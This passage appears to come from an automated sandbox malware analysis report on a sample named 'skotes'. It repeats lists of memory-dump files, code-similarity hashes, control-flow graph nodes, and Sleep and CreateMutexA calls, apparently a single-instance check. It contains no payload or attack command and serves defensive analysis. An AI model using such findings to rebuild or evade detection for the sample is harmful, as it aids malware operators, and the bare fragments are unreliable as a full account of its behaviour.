                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190083042.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190109598.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190134944.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190164290.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190332002.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190359366.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190390502.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190412116.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190436081.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190436081.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190474182.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190489139.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190504469.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190519203.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190539543.0000000000DF4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190562376.0000000000DF5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190577521.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190597488.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190617201.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190632773.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190649011.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190665401.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190686546.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190703277.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190717961.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190732767.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190750881.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190767382.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190782460.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190801321.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190819556.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190836027.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190851456.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190866029.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190883869.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190899959.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190899959.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190949058.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190965422.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190983250.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190998963.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2191013778.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2191029584.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2191050457.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2191068741.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2191085824.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1464230837-0
                                                                                                                                                                                                                                              • Opcode ID: 5aeaf586e4b8e3a881f63609dcfe5ab509687b40c31d5cd2f10cd187e150b484
                                                                                                                                                                                                                                              • Instruction ID: f793bf824cb9246569ef96fd95f43d36431a85343f89d3bcb469b1c9861e27aa
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5aeaf586e4b8e3a881f63609dcfe5ab509687b40c31d5cd2f10cd187e150b484
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DC3146316101449BEB08DB78DDC9B6DF7A2DBC6314F2442AAE014A77E1E77A99808752

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 90 bda1ae-bda1ce 94 bda1fc-bda218 90->94 95 bda1d0-bda1dc 90->95 96 bda21a-bda226 94->96 97 bda246-bda265 94->97 98 bda1de-bda1ec 95->98 99 bda1f2-bda1f9 call bed663 95->99 100 bda23c-bda243 call bed663 96->100 101 bda228-bda236 96->101 102 bda267-bda273 97->102 103 bda293-bda916 call be80c0 97->103 98->99 104 bda935 98->104 99->94 100->97 101->100 101->104 110 bda289-bda290 call bed663 102->110 111 bda275-bda283 102->111 107 bda953-bda994 Sleep CreateMutexA 104->107 108 bda935 call c06c6a 104->108 120 bda9a7-bda9a8 107->120 121 bda996-bda998 107->121 108->107 110->103 111->104 111->110 121->120 122 bda99a-bda9a5 121->122 122->120
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • Sleep.KERNELBASE(00000064), ref: 00BDA963
                                                                                                                                                                                                                                              • CreateMutexA.KERNELBASE(00000000,00000000,00C33254), ref: 00BDA981
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2189953955.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2189931163.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2189953955.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190053283.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190083042.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190109598.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190134944.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190164290.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190332002.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190359366.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190390502.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190412116.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190436081.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190436081.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190474182.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190489139.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190504469.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190519203.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190539543.0000000000DF4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190562376.0000000000DF5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190577521.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190597488.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190617201.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190632773.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190649011.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190665401.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190686546.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190703277.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190717961.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190732767.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190750881.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190767382.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190782460.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190801321.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190819556.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190836027.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190851456.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190866029.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190883869.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190899959.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190899959.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190949058.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190965422.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190983250.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190998963.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2191013778.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2191029584.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2191050457.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2191068741.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2191085824.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1464230837-0
                                                                                                                                                                                                                                              • Opcode ID: 80ad5669fe5af6bc8ced2ce3c891a086c6dad2b5542227cb01fc8e8ee60a2a6a
                                                                                                                                                                                                                                              • Instruction ID: 98fbfa6809b7aca6ed3038ef6e34364a24e5c87b10026c52995c6dd295470abb
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 80ad5669fe5af6bc8ced2ce3c891a086c6dad2b5542227cb01fc8e8ee60a2a6a
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B73124316001449BFB089B79DCC9B6DF7A2EBC6314F2442AAE014A77E1E77A99808752

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 124 bda418-bda438 128 bda43a-bda446 124->128 129 bda466-bda482 124->129 132 bda45c-bda463 call bed663 128->132 133 bda448-bda456 128->133 130 bda484-bda490 129->130 131 bda4b0-bda4cf 129->131 134 bda4a6-bda4ad call bed663 130->134 135 bda492-bda4a0 130->135 136 bda4fd-bda916 call be80c0 131->136 137 bda4d1-bda4dd 131->137 132->129 133->132 138 bda93f-bda949 call c06c6a * 2 133->138 134->131 135->134 135->138 141 bda4df-bda4ed 137->141 142 bda4f3-bda4fa call bed663 137->142 155 bda94e 138->155 156 bda949 call c06c6a 138->156 141->138 141->142 142->136 157 bda953-bda994 Sleep CreateMutexA 155->157 158 bda94e call c06c6a 155->158 156->155 160 bda9a7-bda9a8 157->160 161 bda996-bda998 157->161 158->157 161->160 162 bda99a-bda9a5 161->162 162->160
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • Sleep.KERNELBASE(00000064), ref: 00BDA963
                                                                                                                                                                                                                                              • CreateMutexA.KERNELBASE(00000000,00000000,00C33254), ref: 00BDA981
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2189953955.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2189931163.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2189953955.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190053283.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190083042.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190109598.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190134944.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190164290.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190332002.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190359366.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190390502.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190412116.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190436081.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190436081.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190474182.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190489139.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190504469.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190519203.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190539543.0000000000DF4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190562376.0000000000DF5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190577521.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190597488.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190617201.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190632773.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190649011.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190665401.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190686546.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190703277.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190717961.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190732767.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190750881.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190767382.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190782460.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190801321.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190819556.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190836027.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190851456.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190866029.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190883869.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190899959.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190899959.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190949058.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190965422.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190983250.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190998963.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2191013778.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2191029584.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2191050457.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2191068741.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2191085824.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1464230837-0
                                                                                                                                                                                                                                              • Opcode ID: 27983e30a819e205f2111f7ee990a0f1cc43dadb0e9f7bdfe3aafd8d1a0d1816
                                                                                                                                                                                                                                              • Instruction ID: 661a0559018d6507f8289fe2bce91090b0a63c49354f27518a5819101e09fffb
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 27983e30a819e205f2111f7ee990a0f1cc43dadb0e9f7bdfe3aafd8d1a0d1816
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BD318C316001448BFB08AB78DDC9B6DF7E1DFC5314F20429AE014977D5E7BA59C08752

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 164 bda54d-bda56d 168 bda56f-bda57b 164->168 169 bda59b-bda5b7 164->169 172 bda57d-bda58b 168->172 173 bda591-bda598 call bed663 168->173 170 bda5b9-bda5c5 169->170 171 bda5e5-bda604 169->171 175 bda5db-bda5e2 call bed663 170->175 176 bda5c7-bda5d5 170->176 177 bda606-bda612 171->177 178 bda632-bda916 call be80c0 171->178 172->173 179 bda944-bda949 call c06c6a 172->179 173->169 175->171 176->175 176->179 183 bda628-bda62f call bed663 177->183 184 bda614-bda622 177->184 190 bda94e 179->190 191 bda949 call c06c6a 179->191 183->178 184->179 184->183 195 bda953-bda994 Sleep CreateMutexA 190->195 196 bda94e call c06c6a 190->196 191->190 198 bda9a7-bda9a8 195->198 199 bda996-bda998 195->199 196->195 199->198 200 bda99a-bda9a5 199->200 200->198
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • Sleep.KERNELBASE(00000064), ref: 00BDA963
                                                                                                                                                                                                                                              • CreateMutexA.KERNELBASE(00000000,00000000,00C33254), ref: 00BDA981
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2189953955.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2189931163.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2189953955.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190053283.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190083042.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190109598.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190134944.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190164290.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190332002.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190359366.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190390502.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190412116.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190436081.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190436081.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190474182.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190489139.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190504469.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190519203.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190539543.0000000000DF4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190562376.0000000000DF5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190577521.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190597488.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190617201.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190632773.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190649011.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
